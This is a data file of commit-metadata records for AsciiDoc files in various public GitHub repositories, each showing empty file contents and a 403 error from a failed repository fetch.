{"commit":"ff033416e191b113dba89fe56ae33fc3ee7dc704","subject":"Pr\u00e9c corr","message":"Pr\u00e9c corr\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95b706a16c4cbdf74753d625aa622e9070769c21","subject":"y2b create post You've Never Seen Glasses Like This...","message":"y2b create post You've Never Seen Glasses Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-05-Youve-Never-Seen-Glasses-Like-This.adoc","new_file":"_posts\/2017-03-05-Youve-Never-Seen-Glasses-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3b48003eb6e87046cbb32d728bb7f4273ebd7e4","subject":"Update 2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","message":"Update 2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","new_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"503d61321764ab5609aff6911b6bbb02945150ea","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55615c4d323ba083c420ee046bfde8b977bbd03b","subject":"Update 2017-02-25adocadoc-part-1.adoc","message":"Update 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cd945f66b3d40289137c8dcd5e5721e3b38e2a1","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c13c0ee0b71a8052eacf5d528a6f78c0706c1123","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52ff8e1f53960331fd9ba390745c7dad1d38ff07","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-remotes-Philips-Hue-and-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a0bde7d8261c312e66ba0c5f5079d3c4c57203d","subject":"Create index.adoc","message":"Create index.adoc","repos":"KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da005e87fabf5919f71262acaeedecadd788b428","subject":"test adoc commit","message":"test adoc commit\n","repos":"stitchfix\/clouddriver,duftler\/clouddriver,ajordens\/clouddriver,danveloper\/clouddriver,spinnaker\/clouddriver,danveloper\/clouddriver,lookout\/clouddriver,spinnaker\/clouddriver,lookout\/clouddriver,duftler\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,duftler\/clouddriver,duftler\/clouddriver,ajordens\/clouddriver,cfieber\/clouddriver,lookout\/clouddriver,danveloper\/clouddriver,cfieber\/clouddriver,cfieber\/clouddriver,ajordens\/clouddriver,stitchfix\/clouddriver,spinnaker\/clouddriver","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spinnaker\/clouddriver.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"464f6a4f1ef014469d8f6a3e95746a4d95f22045","subject":"Remove duplicate title in README","message":"Remove duplicate title in README","repos":"asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47581a922b637bda2a5955508020eab3f9c43ca","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"37b50309aabc4804b09face3c11f292315914921","subject":"Update 2017-06-25-Dealing-with-team-rejection.adoc","message":"Update 2017-06-25-Dealing-with-team-rejection.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_file":"_posts\/2017-06-25-Dealing-with-team-rejection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb15f00c2093798405d0a8c484aef9be722ad1d6","subject":"Improvements to the Documentation","message":"Improvements to the Documentation\n\n* added Documentation for #84 and also restructured the configuration section.\n* moved the description of the Analysis Components to an own file and adapted the links accordingly\n* Added the conversational-api section with a focus on the Conversation and Processing results data - model\n * added documentation for #79 describing how to get the information required for client widgets from the analysis results\n * their should be more information about the Webservices, but as this will change considerably with v0.7.0 it does not make sense to invest much time into this part right now\n * also included information requested by #78 and #75 in this section\n","repos":"redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti","old_file":"docs\/src\/analysis-components.asciidoc","new_file":"docs\/src\/analysis-components.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redlink-gmbh\/smarti.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ccc2df4f0585c60ba3c401631e9607c35ec7c69","subject":"Update 2017-08-11-Self-learning-applications-Abstract.adoc","message":"Update 2017-08-11-Self-learning-applications-Abstract.adoc","repos":"egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io","old_file":"_posts\/2017-08-11-Self-learning-applications-Abstract.adoc","new_file":"_posts\/2017-08-11-Self-learning-applications-Abstract.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/egorlitvinenko\/egorlitvinenko.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f5028b210e5ea0b8ef47a537c759864af880426","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c50574214df277a35c09969a324fec608c5ec1ec","subject":"Publish 20161110-1328-have-fun.adoc","message":"Publish 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1328-have-fun.adoc","new_file":"20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75bad6a1963a8e9c72bb82ce4ed738cb1cd44665","subject":"Update 2015-09-18-Test.adoc","message":"Update 2015-09-18-Test.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-Test.adoc","new_file":"_posts\/2015-09-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f354f225da8b3d960f6a02279d660120777d4fae","subject":"Update 2016-03-20-test.adoc","message":"Update 2016-03-20-test.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-test.adoc","new_file":"_posts\/2016-03-20-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ea6dbd35a08c31097e812f5fc49794af2c80693","subject":"Update 2016-6-26-PHRER.adoc","message":"Update 2016-6-26-PHRER.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHRER.adoc","new_file":"_posts\/2016-6-26-PHRER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a560efa1341bec26c68cb091ac4c61b16dd078a","subject":"Update 2017-06-12-Test.adoc","message":"Update 2017-06-12-Test.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-06-12-Test.adoc","new_file":"_posts\/2017-06-12-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55039d0bf9968275595101f5ad1bb6446ec1644c","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6acc3448ed52e49b616da98beb8606a702276fd8","subject":"y2b create post And Then The Bass Dropped...","message":"y2b create post And Then The Bass Dropped...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-02-And-Then-The-Bass-Dropped.adoc","new_file":"_posts\/2016-11-02-And-Then-The-Bass-Dropped.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d9031a0c055467666046761353233b72b8a73c7","subject":"add mesos doc","message":"add mesos doc\n","repos":"the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"docs\/mesos.asciidoc","new_file":"docs\/mesos.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"14fda42bc828e153d13ae28ea36ac09b05cf0a29","subject":"Added asciidoc doc.","message":"Added asciidoc doc.\n","repos":"rsaugier\/ytest,rsaugier\/ytest","old_file":"docs\/ytest.asciidoc","new_file":"docs\/ytest.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rsaugier\/ytest.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c42eb0590dda0b3ae109bc75e71bc40e128ac3f6","subject":"Update 2015-05-02-Test.adoc","message":"Update 2015-05-02-Test.adoc","repos":"lametaweb\/hubpressblogtests,lametaweb\/hubpressblogtests,lametaweb\/hubpressblogtests","old_file":"_posts\/2015-05-02-Test.adoc","new_file":"_posts\/2015-05-02-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/hubpressblogtests.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ee294d4d5a654ddca672d5344978a32e230b1d6","subject":"Adding 0.9.0.CR1 release announcement","message":"Adding 0.9.0.CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-01-28-debezium-0-9-0-cr1-released.adoc","new_file":"blog\/2019-01-28-debezium-0-9-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99eb6a58d74f087aa37b1e0e068f75de387b2ff3","subject":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"630c9d159ab3698402179449ba7222c6c9a86bf5","subject":"Update README","message":"Update README\n","repos":"pjanouch\/desktop-tools,pjanouch\/desktop-tools,pjanouch\/desktop-tools","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/desktop-tools.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"cec3c2ceef3dff8665c06cb9bcb0fa4b6ebaaeac","subject":"Added README.adoc which document, how to build sbuild.","message":"Added README.adoc which document, how to build sbuild.\n","repos":"SBuild-org\/sbuild,SBuild-org\/sbuild","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SBuild-org\/sbuild.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c01ade4fb882cbe9f39f7df10e0a0425a6b4d4","subject":"Refactored README links to use ASCII Doc consistent syntax","message":"Refactored README links to use ASCII Doc consistent syntax\n\nIn addition to the above, fixed links and upgraded to HTTPS where\npossible.\n","repos":"bkuhlmann\/ruby_setup,bkuhlmann\/ruby_setup","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/ruby_setup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d1cf179ebfb62f7a633aabbbde229ec0c0fd085","subject":"Create README.adoc","message":"Create README.adoc","repos":"marcingrzejszczak\/github-webhook","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcingrzejszczak\/github-webhook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d67a5fd4476e7525e2b67a228cb85de24edf869","subject":"Add Bintray download image","message":"Add Bintray download image\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87c215d841e7ba7c33ee15e4f77acaa31439da18","subject":"Add Coveralls coverage status badge","message":"Add Coveralls coverage status badge\n","repos":"spodin\/algorithms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02a767775546f4b68692c8ba1271ec2f01db04af","subject":"Renamed '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc' to '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc'","message":"Renamed '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Enginners-Hackers-Geeks.adoc' to '_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc","new_file":"_posts\/2017-11-30-Best-Diet-for-Programmers-Software-Engineers-Hackers-Geeks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"125483e7aa7d76b77ce0a0594db1993a6f1a1632","subject":"Add a note in the docs that default launch script only works on Linux","message":"Add a note in the docs that default launch script only works on Linux\n\nCloses gh-5446\n","repos":"lexandro\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,eddumelendez\/spring-boot,bbrouwer\/spring-boot,minmay\/spring-boot,rweisleder\/spring-boot,deki\/spring-boot,jvz\/spring-boot,deki\/spring-boot,felipeg48\/spring-boot,jbovet\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,ptahchiev\/spring-boot,yhj630520\/spring-boot,yangdd1205\/spring-boot,minmay\/spring-boot,sebastiankirsch\/spring-boot,tsachev\/spring-boot,sebastiankirsch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,drumonii\/spring-boot,eddumelendez\/spring-boot,bjornlindstrom\/spring-boot,royclarkson\/spring-boot,akmaharshi\/jenkins,brettwooldridge\/spring-boot,vpavic\/spring-boot,jvz\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,yangdd1205\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,jbovet\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,pvorb\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,isopov\/spring-boot,mdeinum\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,ollie314\/spring-boot,joshthornhill\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,joshthornhill\/spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,linead\/spring-boot,bjornlindstrom\/spring-boot,ihoneymon\/spring-boot,DeezCashews\/spring-boot,bbrouwer\/spring-boot,michael-simons\/spring-boot,olivergierke\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot-concourse,donhuvy\/spring-boot,thomasdarimont\/spring-boot,habuma\/spring-boot,htynkn\/spring-boot,i007422\/jenkins2-course-spring-boot,habuma\/spring-boot,michael-simons\/spring-boot,ihoneymon\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,nebhale\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,shangyi0102\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,royclarkson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,javyzheng\/spring-boot,qerub\/spring-boot,jvz\/spring-boot,xiaoleiPENG\/my-project,RichardCSantana\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,jbovet\/spring-boot,javyzheng\/spring-boot,cleverjava\/jenkins2-course-spring-boot,sebastiankirsch\/spring-boot,scottfrederick\/spring-boot,sbcoba\/spring-boot,isopov\/spring-boot,kdvolder\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,aahlenst\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,joshthornhill\/spring-boot,lburgazzoli\/spring-boot,yhj630520\/spring-boot,deki\/spring-boot,philwebb\/spring-boot-concourse,joshiste\/spring-boot,felipeg48\/spring-boot,cleverjava\/jenkins2-course-spring-boot,zhanhb\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,linead\/spring-boot,ihoneymon\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,afroje-reshma\/spring-boot-sample,kdvolder\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,kamilszymanski\/spring-boot,jxblum\/spring-boot,ilayaperumalg\/spring-boot,vakninr\/spring-boot,SaravananParthasarathy\/SPSDemo,linead\/spring-boot,Buzzardo\/spring-boot,javyzheng\/spring-boot,hqrt\/jenkins2-course-spring-boot,herau\/spring-boot,ilayaperumalg\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,Nowheresly\/spring-boot,minmay\/spring-boot,philwebb\/spring-boot,yangdd1205\/spring-boot,qerub\/spring-boot,chrylis\/spring-boot,kdvolder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,olivergierke\/spring-boot,aahlenst\/spring-boot,SaravananParthasarathy\/SPSDemo,linead\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,afroje-reshma\/spring-boot-sample,afroje-reshma\/spring-boot-sample,mdeinum\/spring-boot,jayarampradhan\/spring-boot,Buzzardo\/spring-boot,ihoneymon\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,olivergierke\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,brettwooldridge\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,NetoDevel\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,Buzzardo\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,mbogoevici\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,lucassaldanha\/spring-boot,joshiste\/spring-boot,tiarebalbi\/spring-boot,xiaoleiPENG\/my-project,lucassaldanha\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,yhj630520\/spring-boot,wilkinsona\/spring-boot,mosoft521\/spring-boot,deki\/spring-boot,ptahchiev\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,michael-simons\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,mosoft521\/spring-boot,aahlenst\/spring-boot,NetoDevel\/spring-boot,sbcoba\/spring-boot,javyzheng\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,candrews\/spring-boot,Nowheresly\/spring-boot,jayarampradhan\/spring-boot,bijukunjummen\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,ptahchiev\/spring-boot,royclarkson\/spring-boot,SaravananParthasarathy\/SPSDemo,bijukunjummen\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,NetoDevel\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,tiarebalbi\/spring-boot,mosoft521\/spring-boot,zhanhb\/spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,tsachev\/spring-boot,minmay\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,candrews\/spring-boot,bbrouwer\/spring-boot,jbovet\/spring-boot,pvorb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,shakuzen\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,mbenson\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,dreis2211\/spring-boot,mbogoevici\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-b